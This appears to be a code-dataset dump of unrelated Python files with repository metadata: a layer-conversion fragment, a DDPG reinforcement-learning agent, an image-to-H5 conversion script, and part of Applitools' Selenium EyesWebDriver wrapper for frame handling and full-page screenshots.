cls._convert_output_shape(kwargs, node)
return Node.create('Concat', **kwargs)
@classmethod
def map_dropout(cls, node):
kwargs = {'keep_prob': node.parameters.dropout_ratio}
cls._convert_output_shape(kwargs, node)
return Node.create('Dropout', **kwargs)
@classmethod
def map_batch_norm(cls, node):
kwargs = {'scale' : len(node.data) >= 3, 'bias' : len(node.data) == 4}
epsilon = node.parameters.eps
kwargs['epsilon'] = epsilon
cls._convert_output_shape(kwargs, node)
return Node.create('BatchNorm', **kwargs)
@classmethod
def map_scale(cls, node):
raise NotImplementedError
# TODO: The gamma parameter has to be set (in node.data?) and this should work.
# Also, mean should be set to 0, and var to 1, just to be safe.
scale_value = float(node.parameters.filler.value)
kwargs = {'scale' : True, 'bias' : False, 'gamma' : scale_value, 'epsilon': 0}
return Node.create('BatchNorm', **kwargs)
@classmethod
def map_eltwise(cls, node):
operations = {0: 'Mul', 1: 'Add', 2: 'Max'}
op_code = node.parameters.operation
try:
return Node.create(operations[op_code])
except KeyError:
raise ConversionError('Unknown elementwise operation: {}'.format(op_code))
@classmethod
def map_abs_val(cls, node):
return Node.create('Abs')
@classmethod
def map_tanh(cls, node):
return Node.create('Tanh')
@classmethod
def map_sigmoid(cls, node):
return Node.create('Sigmoid')
@classmethod
def map_reshape(cls, node):
kwargs = {'shape' : [dim for dim in node.output_shape]}
cls._convert_output_shape(kwargs, node)
return Node.create('Reshape', **kwargs)
@classmethod
def map_flatten(cls, node):
return Node.create('Flatten')
| 36.01476
| 147
| 0.616291
|
a7609a76137663823e045ba0784ea045c4c511e3
| 7,985
|
py
|
Python
|
p2_continuous-control/ddpg_agent.py
|
ReactiveXYZ-Dev/deep-reinforcement-learning
|
074318b2a73f61d7fee7e0374c739447ee45b6a0
|
[
"MIT"
] | null | null | null |
p2_continuous-control/ddpg_agent.py
|
ReactiveXYZ-Dev/deep-reinforcement-learning
|
074318b2a73f61d7fee7e0374c739447ee45b6a0
|
[
"MIT"
] | null | null | null |
p2_continuous-control/ddpg_agent.py
|
ReactiveXYZ-Dev/deep-reinforcement-learning
|
074318b2a73f61d7fee7e0374c739447ee45b6a0
|
[
"MIT"
] | null | null | null |
import numpy as np
import random
import copy
from collections import namedtuple, deque
from model import Actor, Critic
import torch
import torch.nn.functional as F
import torch.optim as optim
BUFFER_SIZE = int(1e5) # replay buffer size
BATCH_SIZE = 128 # minibatch size
GAMMA = 0.99 # discount factor
TAU = 1e-3 # for soft update of target parameters
LR_ACTOR = 1e-4 # learning rate of the actor
LR_CRITIC = 1e-3 # learning rate of the critic
WEIGHT_DECAY = 0 # L2 weight decay
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self, state_size, action_size, random_seed):
"""Initialize an Agent object.
Params
======
state_size (int): dimension of each state
action_size (int): dimension of each action
random_seed (int): random seed
"""
self.state_size = state_size
self.action_size = action_size
self.seed = random.seed(random_seed)
# Actor Network (w/ Target Network)
self.actor_local = Actor(
state_size, action_size, random_seed).to(device)
self.actor_target = Actor(
state_size, action_size, random_seed).to(device)
self.actor_optimizer = optim.Adam(
self.actor_local.parameters(), lr=LR_ACTOR)
# Critic Network (w/ Target Network)
self.critic_local = Critic(
state_size, action_size, random_seed).to(device)
self.critic_target = Critic(
state_size, action_size, random_seed).to(device)
self.critic_optimizer = optim.Adam(
self.critic_local.parameters(), lr=LR_CRITIC, weight_decay=WEIGHT_DECAY)
# Noise process
self.noise = OUNoise(action_size, random_seed)
# Replay memory
self.memory = ReplayBuffer(
action_size, BUFFER_SIZE, BATCH_SIZE, random_seed)
def step(self, state, action, reward, next_state, done):
"""Save experience in replay memory, and use random sample from buffer to learn."""
# Save experience / reward
self.memory.add(state, action, reward, next_state, done)
# Learn, if enough samples are available in memory
if len(self.memory) > BATCH_SIZE:
experiences = self.memory.sample()
self.learn(experiences, GAMMA)
def act(self, state, add_noise=True):
"""Returns actions for given state as per current policy."""
state = torch.from_numpy(state).float().to(device)
self.actor_local.eval()
with torch.no_grad():
action = self.actor_local(state).cpu().data.numpy()
self.actor_local.train()
if add_noise:
action += self.noise.sample()
return np.clip(action, -1, 1)
def reset(self):
self.noise.reset()
def learn(self, experiences, gamma):
"""Update policy and value parameters using given batch of experience tuples.
Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
where:
actor_target(state) -> action
critic_target(state, action) -> Q-value
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# ---------------------------- update critic ---------------------------- #
# Get predicted next-state actions and Q values from target models
actions_next = self.actor_target(next_states)
Q_targets_next = self.critic_target(next_states, actions_next)
# Compute Q targets for current states (y_i)
Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Compute critic loss
Q_expected = self.critic_local(states, actions)
critic_loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
# ---------------------------- update actor ---------------------------- #
# Compute actor loss
actions_pred = self.actor_local(states)
actor_loss = -self.critic_local(states, actions_pred).mean()
# Minimize the loss
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
# ----------------------- update target networks ----------------------- #
self.soft_update(self.critic_local, self.critic_target, TAU)
self.soft_update(self.actor_local, self.actor_target, TAU)
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Params
======
local_model: PyTorch model (weights will be copied from)
target_model: PyTorch model (weights will be copied to)
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(
tau*local_param.data + (1.0-tau)*target_param.data)
class OUNoise:
"""Ornstein-Uhlenbeck process."""
def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):
"""Initialize parameters and noise process."""
self.mu = mu * np.ones(size)
self.theta = theta
self.sigma = sigma
self.seed = random.seed(seed)
self.reset()
def reset(self):
"""Reset the internal state (= noise) to mean (mu)."""
self.state = copy.copy(self.mu)
def sample(self):
"""Update internal state and return it as a noise sample."""
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * \
np.array([random.random() for i in range(len(x))])
self.state = x + dx
return self.state
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, buffer_size, batch_size, seed):
"""Initialize a ReplayBuffer object.
Params
======
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
"""
self.action_size = action_size
self.memory = deque(maxlen=buffer_size) # internal memory (deque)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=[
"state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
e = self.experience(state, action, reward, next_state, done)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(
np.vstack([e.state for e in experiences if e is not None])).float().to(device)
actions = torch.from_numpy(
np.vstack([e.action for e in experiences if e is not None])).float().to(device)
rewards = torch.from_numpy(
np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
next_states = torch.from_numpy(np.vstack(
[e.next_state for e in experiences if e is not None])).float().to(device)
dones = torch.from_numpy(np.vstack(
[e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory)
| 38.389423
| 98
| 0.608265
|
bc3446cf696d88f4cf4b566085069b49fa6168c6
| 2,219
|
py
|
Python
|
toh5.py
|
kkaatttiechang/MitoEM2021-Challenge
|
73f6d40d503d108e36a37149579e0173182e01cc
|
[
"MIT"
] | null | null | null |
toh5.py
|
kkaatttiechang/MitoEM2021-Challenge
|
73f6d40d503d108e36a37149579e0173182e01cc
|
[
"MIT"
] | null | null | null |
toh5.py
|
kkaatttiechang/MitoEM2021-Challenge
|
73f6d40d503d108e36a37149579e0173182e01cc
|
[
"MIT"
] | null | null | null |
"""
Code inspired by Donglaiw @ https://github.com/donglaiw/MitoEM-challenge
- h5_name : path to the directory from which the images will be read
- h5_name : name of the H5 file to be created (follow the instructions in
https://mitoem.grand-challenge.org/Evaluation/ to name the
files accordingly)
The H5 file should be saved in the directory where this script was called
"""
import os
import h5py
import argparse
import numpy as np
from os import path
from tqdm import tqdm
from scipy import ndimage
from skimage.io import imread
from PIL import ImageEnhance, Image
from skimage import measure, feature
def get_args():
parser = argparse.ArgumentParser(description="H5 Conversion")
parser.add_argument('--path', type=str, help='source path to the to-be-converted-h5 img dir')
parser.add_argument('--name', type=str, help='name of the to-be-converted-h5 img dir')
parser.add_argument('--saveto', type=str, help='dest path of the to-be-converted-h5 img dir')
args = parser.parse_args()
return args
def convert_to_h5(h5_path, h5_name, h5_saveto):
img_shape = (4096, 4096)
pred_ids = sorted(next(os.walk(h5_path))[2])
h5_name = '0_human_instance_seg_pred.h5'
# Allocate memory for the predictions
pred_stack = np.zeros((len(pred_ids),) + img_shape, dtype=np.int64)
# Read all the images
for n, id_ in tqdm(enumerate(pred_ids)):
img = imread(os.path.join(h5_path, id_))
pred_stack[n] = img
# Apply connected components to make instance segmentation
pred_stack = (pred_stack / 255).astype('int64')
pred_stack, nr_objects = ndimage.label(pred_stack)
print("Number of objects {}".format(nr_objects))
# Create the h5 file (using lzf compression to save space)
h5f = h5py.File(os.path.join(h5_saveto, h5_name), 'w')
h5f.create_dataset('dataset_1', data=pred_stack, compression="lzf")
h5f.close()
def main():
args = get_args()
save2 = os.getcwd()
if args.saveto is not None: save2 = args.saveto
convert_to_h5(args.path, args.name, save2)
if __name__ == "__main__":
main()
| 36.983333
| 97
| 0.673727
|
d35533c87bfb9883f03114e0bb0e8c7eaecf5296
| 35,248
|
py
|
Python
|
applitools/selenium/webdriver.py
|
applitools/eyes.selenium.python
|
3a09a3372a3a8915b3c97ee54fc223580c45c0a3
|
[
"Apache-2.0"
] | 11
|
2016-04-20T21:21:37.000Z
|
2020-04-27T19:46:56.000Z
|
applitools/selenium/webdriver.py
|
applitools/eyes.selenium.python
|
3a09a3372a3a8915b3c97ee54fc223580c45c0a3
|
[
"Apache-2.0"
] | 15
|
2017-01-11T04:58:31.000Z
|
2019-09-13T18:00:35.000Z
|
applitools/selenium/webdriver.py
|
applitools/eyes.selenium.python
|
3a09a3372a3a8915b3c97ee54fc223580c45c0a3
|
[
"Apache-2.0"
] | 15
|
2016-03-23T22:06:39.000Z
|
2020-06-14T09:11:58.000Z
|
from __future__ import absolute_import
import base64
import contextlib
import time
import typing as tp
from PIL import Image
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.switch_to import SwitchTo
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.support.wait import WebDriverWait
from applitools.core import logger
from applitools.core.errors import EyesError
from applitools.core.geometry import Point, Region
from applitools.utils import cached_property, image_utils, general_utils
from . import eyes_selenium_utils, StitchMode
from .positioning import ElementPositionProvider, build_position_provider_for, ScrollPositionProvider
from .webelement import EyesWebElement
from .frames import Frame, FrameChain
if tp.TYPE_CHECKING:
from applitools.core.scaling import ScaleProvider
from applitools.utils.custom_types import Num, ViewPort, FrameReference, AnyWebDriver, AnyWebElement
from .eyes import Eyes
class FrameResolver(object):
def __init__(self, frame_ref, driver):
# Find the frame's location and add it to the current driver offset
if isinstance(frame_ref, str):
frame_eyes_webelement = driver.find_element_by_name(frame_ref)
elif isinstance(frame_ref, int):
frame_elements_list = driver.find_elements_by_css_selector('frame, iframe')
frame_eyes_webelement = frame_elements_list[frame_ref]
elif isinstance(frame_ref, EyesWebElement):
frame_eyes_webelement = frame_ref
else:
# It must be a WebElement
frame_eyes_webelement = EyesWebElement(frame_ref, driver)
self.eyes_webelement = frame_eyes_webelement
self.webelement = frame_eyes_webelement.element
class _EyesSwitchTo(object):
"""
Wraps a selenium "SwitchTo" object, so we can keep track of switching between frames.
It has name EyesTargetLocator in other SDK's
"""
# TODO: Make more similar to EyesTargetLocator
_READONLY_PROPERTIES = ['alert', 'active_element']
PARENT_FRAME = 1
def __init__(self, driver, switch_to):
# type: (EyesWebDriver, SwitchTo) -> None
"""
Ctor.
:param driver: EyesWebDriver instance.
:param switch_to: Selenium switchTo object.
"""
self._switch_to = switch_to
self._driver = driver
self._scroll_position = ScrollPositionProvider(driver)
general_utils.create_proxy_interface(self, switch_to, self._READONLY_PROPERTIES)
@contextlib.contextmanager
def frame_and_back(self, frame_reference):
# type: (FrameReference) -> tp.Generator
self.frame(frame_reference)
yield
self.parent_frame()
def frame(self, frame_reference):
# type: (FrameReference) -> None
"""
Switch to a given frame.
:param frame_reference: The reference to the frame.
"""
frame = FrameResolver(frame_reference, self._driver)
self.will_switch_to_frame(frame.eyes_webelement)
self._switch_to.frame(frame.webelement)
def frames(self, frame_chain):
# type: (FrameChain) -> None
"""
Switches to the frames one after the other.
:param frame_chain: A list of frames.
"""
self._switch_to.default_content()
for frame in frame_chain:
self.frame(frame.reference)
def default_content(self):
# type: () -> None
"""
Switch to default content.
"""
self._driver.frame_chain.clear()
self._switch_to.default_content()
def parent_frame(self):
"""
Switch to parent frame.
"""
frames = self._driver.frame_chain
if frames:
frames.pop()
try:
self._switch_to.parent_frame()
except WebDriverException as e:
self._switch_to.default_content()
for frame in frames:
self._switch_to.frame(frame.reference)
def window(self, window_name):
# type: (tp.Text) -> None
"""
Switch to window.
"""
self._driver.frame_chain.clear()
self._switch_to.window(window_name)
def will_switch_to_frame(self, target_frame):
# type: (EyesWebElement) -> None
"""
Will be called before switching into a frame.
:param target_frame: The element about to be switched to.
"""
assert target_frame is not None
pl = target_frame.location
size_and_borders = target_frame.size_and_borders
borders = size_and_borders.borders
frame_inner_size = size_and_borders.size
content_location = Point(pl['x'] + borders['left'], pl['y'] + borders['top'])
original_location = self._scroll_position.get_current_position()
self._driver.scroll_to(content_location)
frame = Frame(target_frame, content_location, target_frame.size, frame_inner_size,
parent_scroll_position=original_location)
self._driver.frame_chain.push(frame)
class EyesWebDriver(object):
"""
A wrapper for selenium web driver which creates wrapped elements, and notifies us about
events / actions.
"""
# Properties require special handling since even testing if they're callable "activates"
# them, which makes copying them automatically a problem.
_READONLY_PROPERTIES = ['application_cache', 'current_url', 'current_window_handle',
'desired_capabilities', 'log_types', 'name', 'page_source', 'title',
'window_handles', 'switch_to', 'mobile', 'current_context', 'context',
'current_activity', 'network_connection', 'available_ime_engines',
'active_ime_engine', 'device_time', 'w3c', 'contexts', 'current_package',
# Appium specific
'battery_info', 'location']
_SETTABLE_PROPERTIES = ['orientation', 'file_detector']
# This should pretty much cover all scroll bars (and some fixed position footer elements :) ).
_MAX_SCROLL_BAR_SIZE = 50
_MIN_SCREENSHOT_PART_HEIGHT = 10
def __init__(self, driver, eyes, stitch_mode=StitchMode.Scroll):
# type: (WebDriver, Eyes, tp.Text) -> None
"""
Ctor.
:param driver: remote WebDriver instance.
:param eyes: A Eyes sdk instance.
:param stitch_mode: How to stitch a page (default is with scrolling).
"""
self.driver = driver
self._eyes = eyes
self._origin_position_provider = build_position_provider_for(StitchMode.Scroll, driver)
self._position_provider = build_position_provider_for(stitch_mode, driver)
# tp.List of frames the user switched to, and the current offset, so we can properly
# calculate elements' coordinates
self._frame_chain = FrameChain()
self._default_content_viewport_size = None # type: tp.Optional[ViewPort]
self.driver_takes_screenshot = driver.capabilities.get('takesScreenshot', False)
# Creating the rest of the driver interface by simply forwarding it to the underlying
# driver.
general_utils.create_proxy_interface(self, driver,
self._READONLY_PROPERTIES + self._SETTABLE_PROPERTIES)
for attr in self._READONLY_PROPERTIES:
if not hasattr(self.__class__, attr):
setattr(self.__class__, attr, general_utils.create_proxy_property(attr, 'driver'))
for attr in self._SETTABLE_PROPERTIES:
if not hasattr(self.__class__, attr):
setattr(self.__class__, attr, general_utils.create_proxy_property(attr, 'driver', True))
def get_display_rotation(self):
# type: () -> int
"""
Get the rotation of the screenshot.
:return: The rotation of the screenshot we get from the webdriver in (degrees).
"""
if self.platform_name == 'Android' and self.driver.orientation == "LANDSCAPE":
return -90
return 0
def get_platform_name(self):
return self.platform_name
def get_platform_version(self):
return self.platform_version
@cached_property
def platform_name(self):
# type: () -> tp.Optional[tp.Text]
return self.driver.desired_capabilities.get('platformName', None)
@cached_property
def platform_version(self):
# type: () -> tp.Optional[tp.Text]
return self.driver.desired_capabilities.get('platformVersion', None)
@cached_property
def browser_version(self):
# type: () -> tp.Optional[float]
caps = self.driver.capabilities
version = caps.get('browserVersion', caps.get('version', None))
if version:
# convert version that has few dots in to float number (e.g. Edge 1.23.45)
if version.find('.') != -1:
version = float(version[:version.index('.') + 2])
else:
version = float(version)
return version
@cached_property
def browser_name(self):
# type: () -> tp.Optional[tp.Text]
caps = self.driver.capabilities
return caps.get('browserName', caps.get('browser', None))
@cached_property
def user_agent(self):
try:
user_agent = self.driver.execute_script("return navigator.userAgent")
logger.info("user agent: {}".format(user_agent))
except Exception as e:
logger.info("Failed to obtain user-agent string")
user_agent = None
return user_agent
def is_mobile_device(self):
# type: () -> bool
"""
Returns whether the platform running is a mobile device or not.
:return: True if the platform running the test is a mobile platform. False otherwise.
"""
return eyes_selenium_utils.is_mobile_device(self.driver)
def get(self, url):
# type: (tp.Text) -> tp.Optional[tp.Any]
"""
Navigates the driver to the given url.
:param url: The url to navigate to.
:return: A driver that navigated to the given url.
"""
# We're loading a new page, so the frame location resets
self._frame_chain.clear()
return self.driver.get(url)
def find_element(self, by=By.ID, value=None):
# type: (tp.Text, tp.Text) -> EyesWebElement
"""
Returns a WebElement denoted by "By".
:param by: By which option to search for (default is by ID).
:param value: The value to search for.
:return: A element denoted by "By".
"""
# Get result from the original implementation of the underlying driver.
result = self.driver.find_element(by, value)
# Wrap the element.
if result:
result = EyesWebElement(result, self)
return result
def find_elements(self, by=By.ID, value=None):
# type: (tp.Text, tp.Text) -> tp.List[EyesWebElement]
"""
Returns a list of web elements denoted by "By".
:param by: By which option to search for (default is by ID).
:param value: The value to search for.
:return: List of elements denoted by "By".
"""
# Get result from the original implementation of the underlying driver.
results = self.driver.find_elements(by, value)
# Wrap all returned elements.
if results:
updated_results = []
for element in results:
updated_results.append(EyesWebElement(element, self))
results = updated_results
return results
def find_element_by_id(self, id_):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by id.
:params id_: The id of the element to be found.
"""
return self.find_element(by=By.ID, value=id_)
def find_elements_by_id(self, id_):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds multiple elements by id.
:param id_: The id of the elements to be found.
"""
return self.find_elements(by=By.ID, value=id_)
def find_element_by_xpath(self, xpath):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by xpath.
:param xpath: The xpath locator of the element to find.
"""
return self.find_element(by=By.XPATH, value=xpath)
def find_elements_by_xpath(self, xpath):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds multiple elements by xpath.
:param xpath: The xpath locator of the elements to be found.
"""
return self.find_elements(by=By.XPATH, value=xpath)
def find_element_by_link_text(self, link_text):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by link text.
:param link_text: The text of the element to be found.
"""
return self.find_element(by=By.LINK_TEXT, value=link_text)
def find_elements_by_link_text(self, text):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by link text.
:param text: The text of the elements to be found.
"""
return self.find_elements(by=By.LINK_TEXT, value=text)
def find_element_by_partial_link_text(self, link_text):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by a partial match of its link text.
:param link_text: The text of the element to partially match on.
"""
return self.find_element(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_elements_by_partial_link_text(self, link_text):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by a partial match of their link text.
:param link_text: The text of the element to partial match on.
"""
return self.find_elements(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_element_by_name(self, name):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by name.
:param name: The name of the element to find.
"""
return self.find_element(by=By.NAME, value=name)
def find_elements_by_name(self, name):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by name.
:param name: The name of the elements to find.
"""
return self.find_elements(by=By.NAME, value=name)
def find_element_by_tag_name(self, name):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by tag name.
:param name: The tag name of the element to find.
"""
return self.find_element(by=By.TAG_NAME, value=name)
def find_elements_by_tag_name(self, name):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by tag name.
:param name: The tag name to use when finding elements.
"""
return self.find_elements(by=By.TAG_NAME, value=name)
def find_element_by_class_name(self, name):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by class name.
:param name: The class name of the element to find.
"""
return self.find_element(by=By.CLASS_NAME, value=name)
def find_elements_by_class_name(self, name):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by class name.
:param name: The class name of the elements to find.
"""
return self.find_elements(by=By.CLASS_NAME, value=name)
def find_element_by_css_selector(self, css_selector):
# type: (tp.Text) -> EyesWebElement
"""
Finds an element by css selector.
:param css_selector: The css selector to use when finding elements.
"""
return self.find_element(by=By.CSS_SELECTOR, value=css_selector)
def find_elements_by_css_selector(self, css_selector):
# type: (tp.Text) -> tp.List[EyesWebElement]
"""
Finds elements by css selector.
:param css_selector: The css selector to use when finding elements.
"""
return self.find_elements(by=By.CSS_SELECTOR, value=css_selector)
def get_screenshot_as_base64(self):
# type: () -> tp.Text
"""
Gets the screenshot of the current window as a base64 encoded string
which is useful in embedded images in HTML.
"""
screenshot64 = self.driver.get_screenshot_as_base64()
display_rotation = self.get_display_rotation()
if display_rotation != 0:
logger.info('Rotation required.')
# num_quadrants = int(-(display_rotation / 90))
logger.debug('Done! Creating image object...')
screenshot = image_utils.image_from_base64(screenshot64)
# rotating
if display_rotation == -90:
screenshot64 = image_utils.get_base64(screenshot.rotate(90))
logger.debug('Done! Rotating...')
return screenshot64
def get_screesnhot_as_base64_from_main_frame(self):
# type: () -> tp.Text
"""
Make screenshot from main frame
"""
original_frame = self.frame_chain.clone()
self.switch_to.default_content()
screenshot64 = self.get_screenshot_as_base64()
self.switch_to.frames(original_frame)
return screenshot64
def extract_full_page_width(self):
# type: () -> int
"""
Extracts the full page width.
:return: The width of the full page.
"""
# noinspection PyUnresolvedReferences
default_scroll_width = int(round(self.driver.execute_script(
"return document.documentElement.scrollWidth")))
body_scroll_width = int(round(self.driver.execute_script("return document.body.scrollWidth")))
return max(default_scroll_width, body_scroll_width)
def extract_full_page_height(self):
# type: () -> int
"""
Extracts the full page height.
:return: The height of the full page.
IMPORTANT: Notice there's a major difference between scrollWidth and scrollHeight.
While scrollWidth is the maximum between an element's width and its content width,
scrollHeight might be smaller(!) than the clientHeight, which is why we take the
maximum between them.
"""
# noinspection PyUnresolvedReferences
default_client_height = int(round(self.driver.execute_script(
"return document.documentElement.clientHeight")))
# noinspection PyUnresolvedReferences
default_scroll_height = int(round(self.driver.execute_script(
"return document.documentElement.scrollHeight")))
# noinspection PyUnresolvedReferences
body_client_height = int(round(self.driver.execute_script("return document.body.clientHeight")))
# noinspection PyUnresolvedReferences
body_scroll_height = int(round(self.driver.execute_script("return document.body.scrollHeight")))
max_document_element_height = max(default_client_height, default_scroll_height)
max_body_height = max(body_client_height, body_scroll_height)
return max(max_document_element_height, max_body_height)
def get_current_position(self):
# type: () -> Point
"""
Extracts the current scroll position from the browser.
:return: The scroll position.
"""
return self._origin_position_provider.get_current_position()
def scroll_to(self, point):
# type: (Point) -> None
"""
Commands the browser to scroll to a given position.
:param point: The point to scroll to.
"""
self._origin_position_provider.set_position(point)
def get_entire_page_size(self):
# type: () -> tp.Dict[tp.Text, int]
"""
Extracts the size of the current page from the browser using Javascript.
:return: The page width and height.
"""
return {'width': self.extract_full_page_width(),
'height': self.extract_full_page_height()}
def set_overflow(self, overflow, stabilization_time=None):
# type: (tp.Text, tp.Optional[int]) -> tp.Text
"""
Sets the overflow of the current context's document element.
:param overflow: The overflow value to set. If the given value is None, then overflow will be set to
undefined.
:param stabilization_time: The time to wait for the page to stabilize after overflow is set. If the value is
None, then no waiting will take place. (Milliseconds)
:return: The previous overflow value.
"""
logger.debug("Setting overflow: %s" % overflow)
if overflow is None:
script = "var origOverflow = document.documentElement.style.overflow; " \
"document.documentElement.style.overflow = undefined; " \
"return origOverflow;"
else:
script = "var origOverflow = document.documentElement.style.overflow; " \
"document.documentElement.style.overflow = \"{0}\"; " \
"return origOverflow;".format(overflow)
# noinspection PyUnresolvedReferences
original_overflow = self.driver.execute_script(script)
logger.debug("Original overflow: %s" % original_overflow)
if stabilization_time is not None:
time.sleep(stabilization_time / 1000)
eyes_selenium_utils.add_data_overflow_to_element(self.driver, None, original_overflow)
return original_overflow
def wait_for_page_load(self, timeout=3, throw_on_timeout=False):
# type: (int, bool) -> None
"""
Waits for the current document to be "loaded".
:param timeout: The maximum time to wait, in seconds.
:param throw_on_timeout: Whether to throw an exception when timeout is reached.
"""
# noinspection PyBroadException
try:
WebDriverWait(self.driver, timeout) \
.until(lambda driver: driver.execute_script('return document.readyState') == 'complete')
except Exception:
logger.debug('Page load timeout reached!')
if throw_on_timeout:
raise
def hide_scrollbars(self):
# type: () -> tp.Text
"""
Hides the scrollbars of the current context's document element.
:return: The previous value of the overflow property (could be None).
"""
logger.debug('HideScrollbars() called. Waiting for page load...')
self.wait_for_page_load()
logger.debug('About to hide scrollbars')
return self.set_overflow('hidden')
@property
def frame_chain(self):
"""
Gets the frame chain.
:return: A list of Frame instances which represents the path to the current frame.
This can later be used as an argument to _EyesSwitchTo.frames().
"""
return self._frame_chain
def get_viewport_size(self):
# type: () -> ViewPort
"""
Returns:
The viewport size of the current frame.
"""
return eyes_selenium_utils.get_viewport_size(self)
def get_default_content_viewport_size(self, force_query=False):
# type: (bool) -> ViewPort
"""
Gets the viewport size.
:return: The viewport size of the most outer frame.
"""
if self._default_content_viewport_size and not force_query:
return self._default_content_viewport_size
current_frames = self.frame_chain.clone()
# If we're inside a frame, then we should first switch to the most outer frame.
# Optimization
if current_frames:
self.switch_to.default_content()
self._default_content_viewport_size = eyes_selenium_utils.get_viewport_size_or_display_size(self.driver)
if current_frames:
self.switch_to.frames(current_frames)
return self._default_content_viewport_size
def reset_origin(self):
# type: () -> None
"""
Reset the origin position to (0, 0).
:raise EyesError: Couldn't scroll to position (0, 0).
"""
self._origin_position_provider.push_state()
self._origin_position_provider.set_position(Point(0, 0))
current_scroll_position = self._origin_position_provider.get_current_position()
if current_scroll_position.x != 0 or current_scroll_position.y != 0:
self._origin_position_provider.pop_state()
raise EyesError("Couldn't scroll to the top/left part of the screen!")
def restore_origin(self):
# type: () -> None
"""
Restore the origin position.
"""
self._origin_position_provider.pop_state()
def save_position(self):
"""
Saves the position in the _position_provider list.
"""
self._position_provider.push_state()
def restore_position(self):
"""
Restore the position.
"""
self._position_provider.pop_state()
@staticmethod
def _wait_before_screenshot(seconds):
logger.debug("Waiting {} ms before taking screenshot..".format(int(seconds * 1000)))
time.sleep(seconds)
logger.debug("Finished waiting!")
def get_full_page_screenshot(self, wait_before_screenshots, scale_provider):
# type: (Num, ScaleProvider) -> Image.Image
"""
Gets a full page screenshot.
:param wait_before_screenshots: Seconds to wait before taking each screenshot.
:return: The full page screenshot.
"""
logger.info('getting full page screenshot..')
# Saving the current frame reference and moving to the outermost frame.
original_frame = self.frame_chain
self.switch_to.default_content()
self.reset_origin()
entire_page_size = self.get_entire_page_size()
# Starting with the screenshot at 0,0
EyesWebDriver._wait_before_screenshot(wait_before_screenshots)
part64 = self.get_screenshot_as_base64()
screenshot = image_utils.image_from_bytes(base64.b64decode(part64))
scale_provider.update_scale_ratio(screenshot.width)
pixel_ratio = 1.0 / scale_provider.scale_ratio
need_to_scale = True if pixel_ratio != 1.0 else False
if need_to_scale:
screenshot = image_utils.scale_image(screenshot, 1.0 / pixel_ratio)
# IMPORTANT This is required! Since when calculating the screenshot parts for full size,
# we use a screenshot size which is a bit smaller (see comment below).
if (screenshot.width >= entire_page_size['width']) and \
(screenshot.height >= entire_page_size['height']):
self.restore_origin()
self.switch_to.frames(original_frame)
logger.debug("Entire page has size as screenshot")
return screenshot
# We use a smaller size than the actual screenshot size in order to eliminate duplication
# of bottom scroll bars, as well as footer-like elements with fixed position.
screenshot_part_size = {'width': screenshot.width,
'height': max(screenshot.height - self._MAX_SCROLL_BAR_SIZE,
self._MIN_SCREENSHOT_PART_HEIGHT)}
logger.debug("Total size: {0}, Screenshot part size: {1}".format(entire_page_size,
screenshot_part_size))
entire_page = Region(0, 0, entire_page_size['width'], entire_page_size['height'])
screenshot_parts = entire_page.get_sub_regions(screenshot_part_size)
# Starting with the screenshot we already captured at (0,0).
stitched_image = Image.new('RGBA', (entire_page.width, entire_page.height))
stitched_image.paste(screenshot, box=(0, 0))
self.save_position()
for part in screenshot_parts:
# Since we already took the screenshot for 0,0
if part.left == 0 and part.top == 0:
logger.debug('Skipping screenshot for 0,0 (already taken)')
continue
logger.debug("Taking screenshot for {0}".format(part))
# Scroll to the part's top/left and give it time to stabilize.
self._position_provider.set_position(Point(part.left, part.top))
# self.scroll_to(Point(part.left, part.top))
EyesWebDriver._wait_before_screenshot(wait_before_screenshots)
# Since screen size might cause the scroll to reach only part of the way
current_scroll_position = self._position_provider.get_current_position()
logger.debug("Scrolled To ({0},{1})".format(current_scroll_position.x,
current_scroll_position.y))
part64 = self.get_screenshot_as_base64()
part_image = image_utils.image_from_bytes(base64.b64decode(part64))
if need_to_scale:
part_image = image_utils.scale_image(part_image, 1.0 / pixel_ratio)
